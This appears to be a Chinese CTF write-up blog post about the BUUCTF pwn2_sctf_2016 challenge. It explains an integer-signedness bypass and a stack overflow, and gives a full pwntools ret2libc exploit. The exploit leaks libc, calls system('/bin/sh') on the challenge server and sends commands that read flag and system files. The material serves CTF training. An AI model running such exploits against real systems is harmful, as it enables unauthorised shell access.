BUUCTF pwn2_sctf2016

最新推荐文章于 2023-04-18 19:24:54 发布
最新推荐文章于 2023-04-18 19:24:54 发布
阅读量513 收藏 2
点赞数 2
分类专栏: Pwn 文章标签: 网络 学习 linux python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127627042
版权

本题难点:绕过字符串大小限制以及是否掌握了ret2libc。

1.Checksec & IDA Pro

主要关注 vuln、main函数

main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  return vuln();
}

 vuln函数

int vuln()
{
  char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF
  int v2; // [esp+3Ch] [ebp-Ch]

  printf("How many bytes do you want me to read? ");
  get_n((int)nptr, 4u);
  v2 = atoi(nptr);
  if ( v2 > 32 )
    return printf("No! That size (%d) is too large!\n", v2);
  printf("Ok, sounds good. Give me %u bytes of data!\n", v2);
  get_n((int)nptr, v2);
  return printf("You said: %s\n", nptr);
}

 代码分析:

get_n 不是常规的get,get_n 是程序自定义的函数。

其中需要绕过字符串判断才能进行溢出。

if ( v2 > 32 )

为什么输入 -1 就能绕过长度判断呢?

因为 get_n 中,v2 是unsigned int

get_n((int)nptr, v2);

而 vuln 中,v2是 int  

存在整数溢出,可以通过输入负数来绕过长度32的限制

计算机内部,当表示有符号数字时,使用的是补码:当数字为正,符号位取0,其他位按照这个数字值来显示。为负,符号位取1,其他位对应正数值取反后加1。

当转换成unsigned 型时,计算机不再区分符号位,直接把二进制转换为十进制。那1还是1,-1就成了其他值。

栈溢出漏洞位于 nptr 中 

get_n((int)nptr, v2);

 知道如何绕过后,计算溢出字符数量:

到这步输入 -1 绕过大小判断

 

 

可得大小为 44 个字符

 

在IDA Pro中查看 ntpr 一样可以获得,但是少部分时间可能不准确。

因 Ubuntu 16 ,想起来之前BUUCTF给过 Ubuntu 16 的libc,因此本文不使用LibcSearcher。其实使用也没什么大问题。就是要多试几次罢了。

构造Payload:

使用 printf 进行libc地址查询

leak_plt = elf.plt['printf']
leak_got = elf.got['printf']
main_addr = elf.sym['main']

payload=( b'A' * ( 44 + 4 ) + p32(leak_plt) + p32(main_addr) + p32(leak_got) )

real_addr = u32(io.recv(4))

libcbase = real_addr - libc.symbols['printf']
system = libcbase + libc.symbols['system']
bin_sh = libcbase + next(libc.search(b'/bin/sh'))

Payload_Shell

payload_shell = (b'A' * ( 44 + 4 ) + p32(system) + b'aaaa' + p32(bin_sh) )

 完整PoC

from pwn import * 
#from LibcSearcher import LibcSearcher
from LibcSearcherX import *
 
#io = process("/root/Desktop/PwnSubjects/pwn2_sctf_2016")
elf = ELF("/root/Desktop/PwnSubjects/pwn2_sctf_2016")
libc = ELF("/root/Desktop/PwnExploits/Libc/libc-2.23.so") 
io = remote("node4.buuoj.cn",25002)

leak_plt = elf.plt['printf']
leak_got = elf.got['printf']
main_addr = elf.sym['main']

context.log_level='debug'

# 阶段1 泄露真实地址
print("--------------------------------------------------")
print("[+] Leaking real address ...")
print("[+] Phase 1 Inprogress.")


io.recvuntil('How many bytes do you want me to read? ')
io.sendline('-1')
io.recvuntil('\n')
payload=( b'A' * ( 44 + 4 ) + p32(leak_plt) + p32(main_addr) + p32(leak_got) )
io.sendline(payload)
io.recvuntil('\n')
real_addr = u32(io.recv(4))

print("[+] Payload: \n",(payload))
print("[+] Leacked.")
print(("[+] Real Address: "),hex(real_addr))
print("[+] Phase 1 Completed.")
print("--------------------------------------------------")
 
# 阶段2 通过泄露的真实地址计算出system以及/bin/sh的地址
print("[+] Phase 2 Inprogress.")
print("[+] Trying got system and /bin/sh address though real address")
#libc = LibcSearcher("printf",real_addr)
#libcbase = real_addr - libc.dump('printf')
#system = libcbase + libc.dump('system')
#bin_sh = libcbase + libc.dump('str_bin_sh')

#libc = LibcSearcherLocal("printf",real_addr)
#libcbase = real_addr - libc.sym['printf']
#system = libcbase + libc.sym['system']
#bin_sh = libcbase + libc.sym['str_bin_sh']

libcbase = real_addr - libc.symbols['printf']
system = libcbase + libc.symbols['system']
bin_sh = libcbase + next(libc.search(b'/bin/sh'))
print("[+] Phase 2 Completed")
print("--------------------------------------------------")
 
# 阶段3 打印各个地址
print("[+] Phase 3 Inprogress.")
print("[+] Real Address: ",hex(real_addr))
print("[+] Base Address: ",hex(real_addr))
print("[+] System Address: ",hex(system))
print("[+] /bin/sh Address: ",hex(bin_sh))
print("[+] Phase 3 Completed")
print("--------------------------------------------------")
 
# 阶段4 获取shell
io.recvuntil('How many bytes do you want me to read? ')
io.sendline('-1')
io.recvuntil('\n')

payload_shell = (b'A' * ( 44 + 4 ) + p32(system) + b'aaaa' + p32(bin_sh) )

io.sendline(payload_shell)

print("Successfully got shell , Automaticly searching system version.")
print("Got")
io.sendline(b"find '/flag.txt' -exec cat {} \;")
print("The")
io.sendline(b"find '/flag' -exec cat {} \;")
print("Damn")
io.sendline(b"find '/proc/version' -exec cat {} \;")
print("Shell!")
io.interactive()

成功获取flag

PoC原理解析:

绕过字符串大小检测 ---> 溢出 ---> 泄露函数 printf 的plt表地址 ---> 通过后3位在libc文件中查询有相同后3位的libc ---> 计算偏移地址得到基址 ---> 通过基址得到 system、/bin/sh ---> getshell

不知道为什么这套本地打不通,可能是我的系统问题。 

Payload_Shell 中,b'AAAA' 替换成任何一个长度为4的字符串都行。

Red-Leaves
关注
专栏目录
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1023
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2540
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
BUUCTF Pwn pwn2_sctf_2016
MrTreebook的博客
03-13 352
BUUCTF Pwn pwn2_sctf_20161.checksec2.IDA32vuln函数漏洞利用3.exp 1.checksec 没有canary,方便溢出 没有PIE,构造ROP会方便很多 2.IDA32 vuln函数 int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you want me to rea
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 640
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 376
BUUCTF 做题练习
日行一pwn:pwn1_sctf_2016
m0_57221101的博客
05-13 625
用俩图床,有的有水印,有的没水印,折磨 距离上一次日行一pwn已经快一个月了,干脆改成月行一pwn吧(汗。这段时间去恶补了王爽老师的汇编语言。 结果一回来就做了这么一道题,函数封装的严严实实,打眼一看全是C++。想入门pwn这么难吗。 正片 BUUCTF在线评测 使用BUUCTF靶场,首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编 发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法
CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换
serfend's blog
04-14 518
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo 答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路 发现get_flag的位置 发现输入会被替换,构造exp 详细步骤 查看文件信息 查看题目发现是将用户输入的I替换为you,虽然输入的时候只允许输入32位,但是因为替换
buuctf pwn刷题(1)
清霂的博客
01-30 1207
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
【CTF】pwn2_sctf_2016
凉水的博客
07-16 955
pwn2_sctf_2016
pwn2_sctf_2016
z1r0的博客
12-06 741
pwn2_sctf_2016 查看保护 这里的int给转换成了无符号的,输入-1的时候,值会变得很大,整型溢出。ret2libc即可 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25828) else: r = process(file_name)
pwn2_sctf_2016【BUUCTF
qq_41696518的博客
09-01 609
pwn2_sctf_2016【BUUCTF
buuctf pwn2_sctf_2016
carol2358的博客
04-22 273
32的libc rop 64位是7f(8位),32位是f7(4位) exp: from pwn import * from LibcSearcher import * local_file = './pwn2_sctf_2016' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.s...
BUUCTF-Pwn-pwn2_sctf_2016
餐桌上的猫
03-25 246
exp from pwn import* from LibcSearcher import * elf=ELF('/home/lhb/桌面/pwn2_sctf_2016') p=remote('node4.buuoj.cn',27385) printf_plt=elf.plt['printf'] printf_got=elf.got['printf'] main=0x80485b8 p.sendlineafter(b'read? ',b'-1') payload=b'a'*(0x2c+4)+p32(p
[BUUCFT]PWN——pwn2_sctf_2016
BangSen1的博客
04-03 479
pwn2_sctf_2016 例行检查,32位,开启了NX保护。 运行一下 用IDA打开。main函数调用了vuln函数 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,这边可以输入负数来达到溢出的效果(整数溢出) 我们可以通过,输入负数,绕过长度限制,造成溢出,再利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址,最后溢出覆盖返回地址去执行system(‘/bin/sh’) f
BUUCTF-pwn2_sctf_2016(整数溢出+泄露libc)
半岛铁盒的博客
08-02 569
32位开启了nx保护 没有看到system和‘/bin/sh’,开启了NX保护,是泄露libc类型的题目 main函数就调用了一个vuln函数 7行的输入函数不是get,是程序自定义的函数get_n a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。也就是说我们这边可以输入负数来达到溢出的效果(整数溢出) 一开始输入负数,绕过长度限制,造成溢出 利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址 溢出覆盖返回地址去执行sy
[BUUCTF-pwn]——pwn2_sctf_2016
Y_peak的博客
02-12 580
[BUUCTF-pwn]——pwn2_sctf_2016 题目地址: https://buuoj.cn/challenges#pwn2_sctf_2016 老规矩还是先checksec一下, 在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。 最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。 思路 利用printf泄露printf的实际地址, 通过计算偏移,以此
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值